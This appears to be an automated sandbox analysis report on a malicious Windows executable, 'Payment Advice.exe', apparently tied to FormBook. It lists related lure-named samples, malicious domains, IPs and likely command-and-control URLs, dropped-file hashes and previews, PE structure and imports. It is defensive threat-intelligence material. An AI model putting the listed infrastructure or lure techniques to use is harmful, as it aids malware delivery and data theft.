	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	shipping documents.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/4bud/
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	strg.or.at/wordpress/wp-login.php
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Attendance list.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/aroo/
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	www.sandranoll.com/zg5v/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dmtxwuatbz.cc	proforma invoice.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
	shipping documents.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Attendance list.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	Swift Copy #U00a362,271.03.Pdf.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	PO-104678522.exe	Get hash	malicious	FormBook	Browse	172.67.210.102
	NEW ORDER-RFQ#10112023Q4.exe	Get hash	malicious	FormBook	Browse	104.21.45.56
www.sandranoll.com	proforma invoice.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	shipping documents.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
www.xn--matfrmn-jxa4m.se	proforma invoice.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	shipping documents.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	D7KV2Z73zC.rtf	Get hash	malicious	FormBook	Browse	194.9.94.85
www.catherineviskadi.com	proforma invoice.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	shipping documents.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	217.160.0.106
	Attendance list.exe	Get hash	malicious	FormBook	Browse	217.160.0.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DOMAINTECHNIKAT	proforma invoice.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	shipping documents.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	213.145.228.16
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Attendance list.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	213.145.228.16
CLOUDFLARENETUS	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Spec sheet.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	vYhaKbJF08.exe	Get hash	malicious	LummaC	Browse	104.21.16.74
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.146.35
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	hdel.co.kr PURCHASE ORDER.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	PDF To Excel Converter.exe	Get hash	malicious	LummaC, MicroClip	Browse	188.114.96.3
	https://rtgrents.helplook.com/docs/RTGRENTS?preview=1	Get hash	malicious	Unknown	Browse	172.67.144.37
VPSQUANUS	https://57365oo.cc/	Get hash	malicious	Phisher	Browse	69.165.74.254
	proforma invoice.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	shipping documents.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	23.251.54.212
	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	1.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	v9.exe	Get hash	malicious	Unknown	Browse	154.222.224.99
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	69.165.74.76
LOOPIASE	proforma invoice.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	shipping documents.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	http://tok2np0cklt.top/	Get hash	malicious	Unknown	Browse	194.9.94.85
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Attendance list.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Navana Pharmaceuticals PLC.pdf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85

Process:	C:\Windows\SysWOW64\clip.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Vevine

Download File

Process:	C:\Users\user\Desktop\Payment Advice.exe
File Type:	ASCII text, with very long lines (57348), with no line terminators
Category:	dropped
Size (bytes):	57348
Entropy (8bit):	2.787278756410606
Encrypted:	false
SSDEEP:	384:ljTFhSe7M1ae8tVGs6pZw5siKK8Dv0JCuW/+Xv2P0/GfW4:lnFhSe7M1avVu+s1GJ7WmXbo
MD5:	C7B4740985ABA9361B8081DECB4597BE
SHA1:	C7EADEB5A45E67625E63A038CED2EE155823F711
SHA-256:	577D47CC428AFEF9B663DE37ACD4E00645132B868DE9E5C82F244E73A2342F12
SHA-512:	4C3197FCF10331CCBF308DFB1A142B7D00561BF22DA4BF1F45BA517C199B914CD693B250B1513D62A3F70973409455C886D9E9C8FFE813BCDF06EBF958FAA70F
Malicious:	false
Reputation:	low
Preview:	00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c2cd55eb80c3320becf54b800000000cf547c70becfd4988fd4b880470c58000000c859ffffa6058f54d8424700000000c8db3880ce38ceb855cccccccccccccccccc00c02ce5f5954a3f8142c4b80142c7b8414247b8157565cccccccccccccccccccccc00802caf57b4242088c042c5b88042

C:\Users\user\AppData\Local\Temp\autF31D.tmp

Download File

Process:	C:\Users\user\Desktop\Payment Advice.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.991220230327299
Encrypted:	true
SSDEEP:	6144:Xsv2SwxXvgfiVqqip7wOUdEzKFUhJjyTKg7Ww7BBBB+E:g2tvgfMbQ6sbIail5
MD5:	4DE6ACC4C35CABB4CAF598384795EA2D
SHA1:	125D15A0325CB19E5FA45BA934E3AFC35F055456
SHA-256:	223994004B9AC44842BE98492418D60B636D0128152B05BC195EC6CC47611D94
SHA-512:	A98202FB1C4EF3D0D9551DE248DE0A0CD842793C0308E0E6C449DBDBC076CA330BB7E5B06F89E97791B4E5E624D3652A3FBF6FE97F8B6893DE21CA46C34D3550
Malicious:	false
Reputation:	low
Preview:	.....96E8..N.....8I..mD;...8JMWGEG396E8JMWGEG396E8JMWGEG3.6E8DR.IE.:...9..v.-.@.F7W-?6e$RWXLj/2g72]._+....g((W\.H5@iWGEG396<9C.j'"..YQ..*.]....V".P...y'T.,.q7 ..ZZ^xX-.WGEG396Eh.MW.DF3(o}XJMWGEG39.E:KFVLEG#=6E8JMWGEG.,6E8ZMWGeC396.8J]WGEE390E8JMWGEA396E8JMWgAG3;6E8JMWEE..96U8J]WGEG#96U8JMWGEW396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEiG\N18JM.HAG3)6E8ZIWGUG396E8JMWGEG39.E8MWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8J

C:\Users\user\AppData\Local\Temp\autF34D.tmp

Download File

Process:	C:\Users\user\Desktop\Payment Advice.exe
File Type:	data
Category:	dropped
Size (bytes):	11218
Entropy (8bit):	7.618114161420166
Encrypted:	false
SSDEEP:	192:lE7FGNNtmK2x+jKInSpEv2cuELgZE3dD0CYUFniOYMzOli:lcGrtmK2A3MEYqV0cFnXYFi
MD5:	78929D7D7FDDBB8314F0F68FCBEB0015
SHA1:	29B91A3AE86FEDFB5794DE14CBCBFB8103AF0398
SHA-256:	4696F2B41EC5CB3D5183C55274C2A5F238E6DBC36668547F82443A54CA6A328A
SHA-512:	C384517FDFB41A37DD424384C58CB6620CB1275BCE70B2779A33D763D1FA304290CAC4021C4FC57ED6177EA367B6D60563284EE897E0AED786CC0160BF631085
Malicious:	false
Reputation:	low
Preview:	EA06.....J........d..Y%SP."..J........... .B.....@...\|`......p.........8......\|.. ....3...P."......l.,.. ......@. ...........Y.....B.....C .M.....L...B.....L.....(.`..b..X.C6.!....4.....C3...n..M. ?...N."3a......... ...2......@....M..6.A.....h...!O....Y..>.0..@9...a4.......Lg.......&' ....@....p.... N....Sv.)..bj.MY........vf@.......14.p...'.....W@..(..,...E....8}V ....q.p..`........p~...M......l......d.....t.....l.s..f..........6@"0.....b.(..53.@.....bvn......s........d.....6.....#.)........1a.0..S14.L...5.$' .......3.@.....@........vd.....h.... l...... .L..C...... ........eFh......@y55. ..90.,.-3p!..@I:...-.l`.....\|........l.........c....G...7.......<.Y..g.......A.>.....2.x.,>0..L..:.....>`'....9H.....'.Y..>@&.M.Q..D.S..J\|...).6.....1b....I..O....@.O.... ,......`.... <.....X0.)... :..V&.H. .f.Q8...(<&@...$.I..z\|.Y...H}........8.H...>i.....X..~ U....a..&.\.....& 0..=......H...;<....3 ...d.y.DO.`.y...h.C..ff...LAM?@........@.4.........n>i.&ff."...lA].......I8...

C:\Users\user\AppData\Local\Temp\ferritic

Download File

Process:	C:\Users\user\Desktop\Payment Advice.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.991220230327299
Encrypted:	true
SSDEEP:	6144:Xsv2SwxXvgfiVqqip7wOUdEzKFUhJjyTKg7Ww7BBBB+E:g2tvgfMbQ6sbIail5
MD5:	4DE6ACC4C35CABB4CAF598384795EA2D
SHA1:	125D15A0325CB19E5FA45BA934E3AFC35F055456
SHA-256:	223994004B9AC44842BE98492418D60B636D0128152B05BC195EC6CC47611D94
SHA-512:	A98202FB1C4EF3D0D9551DE248DE0A0CD842793C0308E0E6C449DBDBC076CA330BB7E5B06F89E97791B4E5E624D3652A3FBF6FE97F8B6893DE21CA46C34D3550
Malicious:	false
Reputation:	low
Preview:	.....96E8..N.....8I..mD;...8JMWGEG396E8JMWGEG396E8JMWGEG3.6E8DR.IE.:...9..v.-.@.F7W-?6e$RWXLj/2g72]._+....g((W\.H5@iWGEG396<9C.j'"..YQ..*.]....V".P...y'T.,.q7 ..ZZ^xX-.WGEG396Eh.MW.DF3(o}XJMWGEG39.E:KFVLEG#=6E8JMWGEG.,6E8ZMWGeC396.8J]WGEE390E8JMWGEA396E8JMWgAG3;6E8JMWEE..96U8J]WGEG#96U8JMWGEW396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEiG\N18JM.HAG3)6E8ZIWGUG396E8JMWGEG39.E8MWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8JMWGEG396E8J

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.097519743671189
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Payment Advice.exe
File size:	1'170'944 bytes
MD5:	2f66c56f11963a398518cee0dde2c123
SHA1:	f8bf7a9e597a3f6515b2c4f2692bd29964f68bef
SHA256:	360b32e7a4c150198ba6f01ca94a9f31a6f95ac8a00a87a453206cdbad727d94
SHA512:	ddcc3f8a69e3b1b9b76e557a5dcd3484e19d4020b80da10debae459b46bc6681a04b1b5f0e176eb8a4a3bc0a7042d0e600cefe35a2d3be7ef205fd2ea95d7118
SSDEEP:	24576:Itb20pkaCqT5TBWgNQ7au/AEmDUvy3FSm6A:RVg5tQ7au7vyz5
TLSH:	2F45CF1373DDC365C3725273BA66B701AEBF782506A1F56B2FD8093DE920122521EA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CFC070 [Thu Aug 29 00:27:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F8F9CB6BA4Fh
jmp 00007F8F9CB5EA64h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F8F9CB5EBEAh
cmp edi, eax
jc 00007F8F9CB5EF4Eh
bt dword ptr [004C0158h], 01h
jnc 00007F8F9CB5EBE9h
rep movsb
jmp 00007F8F9CB5EEFCh
cmp ecx, 00000080h
jc 00007F8F9CB5EDB4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F8F9CB5EBF0h
bt dword ptr [004BA370h], 01h
jc 00007F8F9CB5F0C0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F8F9CB5ED8Dh
test edi, 00000003h
jne 00007F8F9CB5ED9Eh
test esi, 00000003h
jne 00007F8F9CB5ED7Dh
bt edi, 02h
jnc 00007F8F9CB5EBEFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F8F9CB5EBF3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F8F9CB5EC45h
bt esi, 03h
jnc 00007F8F9CB5EC98h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x54c38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x119000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x54c38	0x54e00	6d2c1b40787ee9201237765df4d0ddb5	False	0.9219756765463918	data	7.882028343974578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x119000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x4bf10	data			1.0003247003754951
RT_GROUP_ICON	0x1186c8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x118740	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x118754	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x118768	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11877c	0x10c	data	English	Great Britain	0.5895522388059702
RT_MANIFEST	0x118888	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, 